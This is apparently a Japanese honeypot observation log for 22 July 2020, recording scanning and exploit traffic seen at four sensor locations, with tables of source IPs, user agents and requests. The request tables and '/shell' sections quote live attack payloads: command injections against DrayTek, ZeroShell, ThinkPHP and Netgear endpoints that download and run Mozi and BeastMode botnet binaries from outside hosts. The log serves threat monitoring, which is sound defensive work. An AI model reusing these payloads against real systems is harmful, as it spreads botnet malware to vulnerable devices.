2020/07/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/07/22分です。

特徴

Location：JP

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location：US

Asustor NASの脆弱性を狙うアクセス
ASUS modemの脆弱性を狙うアクセス
AVTECH IP Camera/NVR/DVR Devicesの脆弱性を狙うアクセス
Dell KACE Systems Management Applianceの脆弱性を狙うアクセス
DLink製品の脆弱性を狙うアクセス
EnGenius EnShare IoT Gigabit Cloud Serviceの脆弱性を狙うアクセス
Enigma NMSの脆弱性を狙うアクセス
Geutebruck IP Cameraの脆弱性を狙うアクセス
GoAhead IP Cameraの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Huaweiルータの脆弱性を狙うアクセス
HooToo TripMaterルータの脆弱性を狙うアクセス
LG Supersignの脆弱性を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
Linksys E-series devicesの脆弱性を狙うアクセス
MiCasa VeraLit Smart home controllerの脆弱性を狙うアクセス
NetGain Enterprise Managerの脆弱性を狙うアクセスの脆弱性を狙うアクセス
Netgear ReadyNasの脆弱性を狙うアクセス
NUUO NVRminiの脆弱性を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
Schneider Electric U.motion LifeSpace Management Systemの脆弱性(CVE-2018-7841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Vacron NVR Devicesの脆弱性を狙うアクセス
VMware NSX SD-WAN Edgeの脆弱性(CVE-2018-6961)を狙うアクセス
WePresent Wireless Presentation Systemの脆弱性を狙うアクセス
Wireless Presentation Systemの脆弱性(CVE-2019-3929)を狙うアクセス
ZTEルータの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
Googlebotによるスキャン行為
GoScraperによるスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：UK

DrayTek製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 95.213.165.45/beastmode/b3astmode;
chmod 777 /tmp/b3astmode;
sh /tmp/b3astmode BeastMode.Rep.Jaws

Location：SG

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 165.22.101.145/beastmode/b3astmode;
chmod 777 /tmp/b3astmode;
sh /tmp/b3astmode BeastMode.Rep.Jaws

他

アクセス数推移

JP：総アクセス数：60 (前日比：-37)
US：総アクセス数：242 (前日比：+102)
UK：総アクセス数：23 (前日比：-12)
SG：総アクセス数：28 (前日比：+13)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	5.182.210.205	Netherlands
1	5.188.210.227	Russia
6	52.176.48.56	United States
3	59.127.105.216	Taiwan
1	93.174.93.139	Netherlands
3	94.230.208.147	Switzerland
1	114.113.112.92	China
1	162.243.128.13	United States
27	180.240.191.222	Singapore
7	195.54.160.21	Russia
5	195.154.171.182	France
1	196.202.71.90	Egypt
1	200.119.45.66	Colombia

UserAgent一覧

件数	UserAgent
40	-
3	Go-http-client/1.1
5	Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 zgrab/0.x
1	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
3		-
3		\x16\x03\x01
2	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	//MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//myadmin/scripts/setup.php	HTTP/1.1
1	GET	//phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	//pma/scripts/setup.php	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
27	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/muieblackcat	HTTP/1.1
1	GET	/portal/.env	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/v2/_catalog	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	HTTP/1.1	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	5.182.210.205	Netherlands
1	37.49.224.33	Estonia
1	49.89.3.63	China
1	61.219.11.153	Taiwan
1	80.82.70.118	Netherlands
197	89.144.47.5	Germany
1	93.174.93.139	Netherlands
1	104.131.8.207	United States
1	104.131.13.221	United States
20	107.167.7.226	United States
10	129.28.172.238	China
4	139.205.177.97	China
1	222.240.117.51	China

UserAgent一覧

件数	UserAgent
6	-
1	Go-http-client/1.1
24	GoScraper
173	Googlebot/2.1 (+http://www.google.com/bot.html)
1	Hello, World
1	Hello, world
4	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15
20	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
3		\x16\x03\x01
1		\x16\x03\x02\x01o\x01
1	GET	/.env	HTTP/1.1
1	GET	/.local	HTTP/1.1
1	GET	/.production	HTTP/1.1
1	GET	/.remote	HTTP/1.1
1	GET	//app/.env	HTTP/1.1
1	GET	//apps/.env	HTTP/1.1
1	GET	//assets/.env	HTTP/1.1
1	GET	//config/.env	HTTP/1.1
1	GET	//core/.env	HTTP/1.1
1	GET	//core/Datavase/.env	HTTP/1.1
1	GET	//core/app/.env	HTTP/1.1
1	GET	//cron/.env	HTTP/1.1
1	GET	//cronlab/.env	HTTP/1.1
1	GET	//database/.env	HTTP/1.1
1	GET	//lab/.env	HTTP/1.1
1	GET	//lib/.env	HTTP/1.1
1	GET	//saas/.env	HTTP/1.1
1	GET	//sitemaps/.env	HTTP/1.1
1	GET	//uploads/.env	HTTP/1.1
1	GET	//vendor/.env	HTTP/1.1
1	GET	/Diagnostics.asp	HTTP/1.1
1	GET	/GponForm/diag_Form?images/	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/Main_Analysis_Content.asp	HTTP/1.1
2	GET	/NonExistence	HTTP/1.1
1	GET	/OvCgi/connectedNodes.ovpl	HTTP/1.1
1	GET	/SGPAdmin/fileRequest	HTTP/1.1
1	GET	/SetSmarcardSettings.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/UD/act	HTTP/1.1
1	GET	/VhttpdMgr	HTTP/1.1
1	GET	/_async/AsyncResponseServiceHttps	HTTP/1.1
1	GET	/_search	HTTP/1.1
1	GET	/action.php	HTTP/1.1
1	GET	/actionHandler/ajax_network_diagnostic_tools.php	HTTP/1.1
1	GET	/adm.php	HTTP/1.1
1	GET	/admin.cgi	HTTP/1.1
1	GET	/adminer.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi	HTTP/1.1
1	GET	/api/backup/logout.cgi	HTTP/1.1
2	GET	/api/project/repo/log/graph/	HTTP/1.1
1	GET	/app/lan/BeforeLoginCn.js	HTTP/1.1
1	GET	/apply.cgi	HTTP/1.1
1	GET	/apps/a3/cfg_ethping.cgi	HTTP/1.1
1	GET	/awcuser/cgi-bin/vcs	HTTP/1.1
1	GET	/awstatstotals/awstatstotals.php	HTTP/1.1
1	GET	/ayefeaturesconvert.js	HTTP/1.1
1	GET	/boaform/admin/formPing	HTTP/1.1
1	GET	/board.cgi	HTTP/1.1
1	GET	/boardData102.php	HTTP/1.1
1	GET	/boardData103.php	HTTP/1.1
1	GET	/boardDataJP.php	HTTP/1.1
1	GET	/boardDataNA.php	HTTP/1.1
2	GET	/boardDataWW.php	HTTP/1.1
1	GET	/card_scan_decoder.php	HTTP/1.0
1	GET	/card_scan_decoder.php	HTTP/1.1
1	GET	/ccbill/whereami.cgi	HTTP/1.1
1	GET	/cgi	HTTP/1.1
1	GET	/cgi-bin/ViewLog.asp	HTTP/1.1
1	GET	/cgi-bin/admin/servetest	HTTP/1.1
1	GET	/cgi-bin/adv_remotelog.asp	HTTP/1.1
1	GET	/cgi-bin/apply.cgi	HTTP/1.1
1	GET	/cgi-bin/awstats.pl	HTTP/1.1
1	GET	/cgi-bin/bconf.cgi	HTTP/1.1
1	GET	/cgi-bin/board.cgi	HTTP/1.1
1	GET	/cgi-bin/ccbill/whereami.cgi	HTTP/1.1
1	GET	/cgi-bin/cgiServer.exx	HTTP/1.1
1	GET	/cgi-bin/cgi_system	HTTP/1.1
2	GET	/cgi-bin/cgi_system?cmd=saveconfig	HTTP/1.1
1	GET	/cgi-bin/ddns_start.cgi	HTTP/1.1
1	GET	/cgi-bin/diagnostic.cgi	HTTP/1.1
1	GET	/cgi-bin/file_transfer.cgi	HTTP/1.1
2	GET	/cgi-bin/getddnsattr.cgi	HTTP/1.1
1	GET	/cgi-bin/getinetattr.cgi	HTTP/1.1
1	GET	/cgi-bin/getnettype.cgi	HTTP/1.1
1	GET	/cgi-bin/getupnp.cgi	HTTP/1.1
1	GET	/cgi-bin/getwifiattr.cgi	HTTP/1.1
1	GET	/cgi-bin/getwifistatus.cgi	HTTP/1.1
1	GET	/cgi-bin/img.pl	HTTP/1.1
1	GET	/cgi-bin/inetconfig.cgi	HTTP/1.1
1	GET	/cgi-bin/iptest.cgi	HTTP/1.1
1	GET	/cgi-bin/kerbynet	HTTP/1.1
1	GET	/cgi-bin/listwifiap.cgi	HTTP/1.1
2	GET	/cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/api/xqsmarthome/request_mitv	HTTP/1.1
2	GET	/cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/expert/maintenance/diagnostic/nslookup	HTTP/1.1
1	GET	/cgi-bin/luci/;stok=a714f92968ab8cc6466f87c8618cfc30/api/misns/wifi_access	HTTP/1.1
1	GET	/cgi-bin/luci/expert/maintenance/diagnostic/nslookup	HTTP/1.1
1	GET	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	GET	/cgi-bin/masterCGI	HTTP/1.1
1	GET	/cgi-bin/nobody/Search.cgi	HTTP/1.1
2	GET	/cgi-bin/operator/servetest	HTTP/1.1
1	GET	/cgi-bin/p2p.cgi	HTTP/1.1
2	GET	/cgi-bin/pages/maintenance/logSetting/logSet.asp	HTTP/1.1
1	GET	/cgi-bin/paraconf.cgi	HTTP/1.1
1	GET	/cgi-bin/preview_email.cgi	HTTP/1.1
1	GET	/cgi-bin/protected/discover_and_manage.cgi	HTTP/1.1
1	GET	/cgi-bin/rdfs.cgi	HTTP/1.1
2	GET	/cgi-bin/scanwifi.cgi	HTTP/1.1
1	GET	/cgi-bin/script	HTTP/1.1
1	GET	/cgi-bin/setadslattr.cgi	HTTP/1.1
1	GET	/cgi-bin/setddnsattr.cgi	HTTP/1.1
2	GET	/cgi-bin/setinetattr.cgi	HTTP/1.1
1	GET	/cgi-bin/setwifiattr.cgi	HTTP/1.1
1	GET	/cgi-bin/spboard/board.cgi	HTTP/1.1
1	GET	/cgi-bin/statuswml.cgi	HTTP/1.1
1	GET	/cgi-bin/system.cgi	HTTP/1.1
2	GET	/cgi-bin/test	HTTP/1.1
1	GET	/cgi-bin/tools_time.asp	HTTP/1.1
1	GET	/cgi-bin/upnp_start.cgi	HTTP/1.1
1	GET	/cgi-bin/webcm	HTTP/1.1
1	GET	/cgi-bin/webctrl.cgi	HTTP/1.1
1	GET	/cgi-bin/whereami.cgi	HTTP/1.1
1	GET	/cgi-bin/wifimode.cgi	HTTP/1.1
1	GET	/cgi-bin/wifitest.cgi	HTTP/1.1
1	GET	/command.php	HTTP/1.1
1	GET	/csspwn.php	HTTP/1.1
1	GET	/ctrlt/DeviceUpgrade_1	HTTP/1.1
2	GET	/debug.cgi	HTTP/1.1
1	GET	/diagnostic.php	HTTP/1.1
1	GET	/dnslookup.cgi	HTTP/1.1
1	GET	/dogfood/mail/spell.php	HTTP/1.1
1	GET	/editBlackAndWhiteList	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/getpage.gch	HTTP/1.1
1	GET	/global_data/	HTTP/1.1
1	GET	/globe	HTTP/1.1
2	GET	/goform/formSysCmd	HTTP/1.1
2	GET	/goform/mp	HTTP/1.1
1	GET	/goip/cron.htm	HTTP/1.1
1	GET	/handle_iscsi.php	HTTP/1.1
1	GET	/hndBlock.cgi	HTTP/1.1
1	GET	/hndUnblock.cgi	HTTP/1.1
1	GET	/horde/imp/test.php	HTTP/1.1
1	GET	/html/SetSmarcardSettings.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/imp/test.php	HTTP/1.1
1	GET	/incl/image_test.shtml	HTTP/1.1
1	GET	/index.html?findcli=-1	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();'	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/js/Multi_Language.js	HTTP/1.1
1	GET	/language/Swedish	HTTP/1.1
1	GET	/linuxki/experimental/vis/kivis.php	HTTP/1.1
2	GET	/login.action	HTTP/1.1
1	GET	/login.cgi	HTTP/1.1
1	GET	/login.gch	HTTP/1.1
1	GET	/login.php	HTTP/1.1
1	GET	/login_handler.php	HTTP/1.1
2	GET	/maintenance/controllerFlirSystem.php	HTTP/1.1
1	GET	/maker/snwrite.cgi	HTTP/1.1
1	GET	/mnt_ping.cgi	HTTP/1.1
1	GET	/moadmin/moadmin.php	HTTP/1.1
1	GET	/monitor/op5/nacoma/command_test.php	HTTP/1.1
2	GET	/nagios/cgi-bin/statuswml.cgi	HTTP/1.1
1	GET	/ona/	HTTP/1.1
1	GET	/op5config/welcome	HTTP/1.1
1	GET	/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2	HTTP/1.1
1	GET	/page/maintenance/lanSettings/dns	HTTP/1.1
1	GET	/pages/systemcall.php	HTTP/1.1
1	GET	/parse_xml.cgi	HTTP/1.1
1	GET	/phpMoAdmin/moadmin.php	HTTP/1.1
1	GET	/phpmoadmin/moadmin.php	HTTP/1.1
1	GET	/picsdesc.xml	HTTP/1.1
1	GET	/ping.cgi	HTTP/1.1
1	GET	/portal/apis/aggrecate_js.cgi	HTTP/1.1
1	GET	/protocol.csp	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();'	HTTP/1.1
1	GET	/qsr_server/device/getThumbnail	HTTP/1.1
1	GET	/qsrserver/device/getThumbnail	HTTP/1.1
1	GET	/recordings/misc/callme_page.php	HTTP/1.1
1	GET	/repository/annotate	HTTP/1.1
1	GET	/sarFILE/style.css	HTTP/1.1
1	GET	/scripts/ajaxPortal.lua	HTTP/1.1
1	GET	/scripts/rpc.php	HTTP/1.1
1	GET	/sdwan/nitro/v1/config/get_package_file	HTTP/1.1
1	GET	/service/krashrpt.php	HTTP/1.1
1	GET	/setSystemCommand	HTTP/1.1
2	GET	/set_ftp.cgi	HTTP/1.1
1	GET	/setup.cgi	HTTP/1.1
1	GET	/setup.xml	HTTP/1.1
1	GET	/shell	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
2	GET	/shell?echo+ukrmoney	HTTP/1.1
2	GET	/smartdomuspad/modules/reporting/track_import_export.php	HTTP/1.1
1	GET	/smb_scheduler/cdr.htm	HTTP/1.1
1	GET	/soap.cgi	HTTP/1.1
1	GET	/softnas/snserver/snserv.php	HTTP/1.1
1	GET	/stainfo.cgi	HTTP/1.1
1	GET	/system.ini?loginuse&loginpas	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/tmBlock.cgi	HTTP/1.1
1	GET	/tmUnblock.cgi	HTTP/1.1
1	GET	/u/jsp/tools/exec.jsp	HTTP/1.1
1	GET	/uapi-cgi/admin/testaction.cgi	HTTP/1.1
1	GET	/uapi-cgi/viewer/admin/testaction.cgi	HTTP/1.1
2	GET	/uapi-cgi/viewer/simple_loglistjs.cgi	HTTP/1.1
1	GET	/uapi-cgi/viewer/testaction.cgi	HTTP/1.1
2	GET	/upgrade_handle.php	HTTP/1.1
2	GET	/upnp/control/hag	HTTP/1.1
1	GET	/user/register	HTTP/1.1
1	GET	/utility.cgi	HTTP/1.1
1	GET	/web/cgi-bin/usbinteract.cgi	HTTP/1.1
1	GET	/webadmin/script	HTTP/1.1
1	GET	/wls-wsat/CoordinatorPortType	HTTP/1.1
1	GET	/wp-content/plugins/dzs-videogallery/img.php	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	60.246.11.234	Macao
4	80.82.77.33	Netherlands
1	89.248.168.39	Netherlands
1	93.174.93.139	Netherlands
1	96.69.158.193	United States
1	98.235.253.175	United States
2	143.92.32.86	Singapore
1	162.243.128.147	United States
1	190.94.192.8	Venezuela
1	192.241.233.249	United States
7	195.54.160.21	Russia
1	200.217.4.9	Brazil
1	223.149.252.240	China

UserAgent一覧

件数	UserAgent
9	-
1	Hello, world
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 zgrab/0.x
1	polaris botnet
1	python-requests/2.23.0
1	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
1	CONNECT	g[.]alicdn[.]com/:443	HTTP/1.1
1	CONNECT	httpbin[.]org/:443	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+95.213.165.45/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	5.182.210.205	Netherlands
1	5.188.210.227	Russia
1	31.182.159.17	Poland
1	93.174.93.139	Netherlands
1	102.43.18.31	Egypt
1	159.18.94.65	Canada
1	161.97.81.64	Germany
1	162.243.128.57	United States
1	192.241.238.37	United States
14	195.54.160.21	Russia
3	195.154.171.182	France

UserAgent一覧

件数	UserAgent
6	-
1	Hello, world
3	Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
14	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
3		\x16\x03\x01
1	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/hudson	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	OPTIONS	*	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1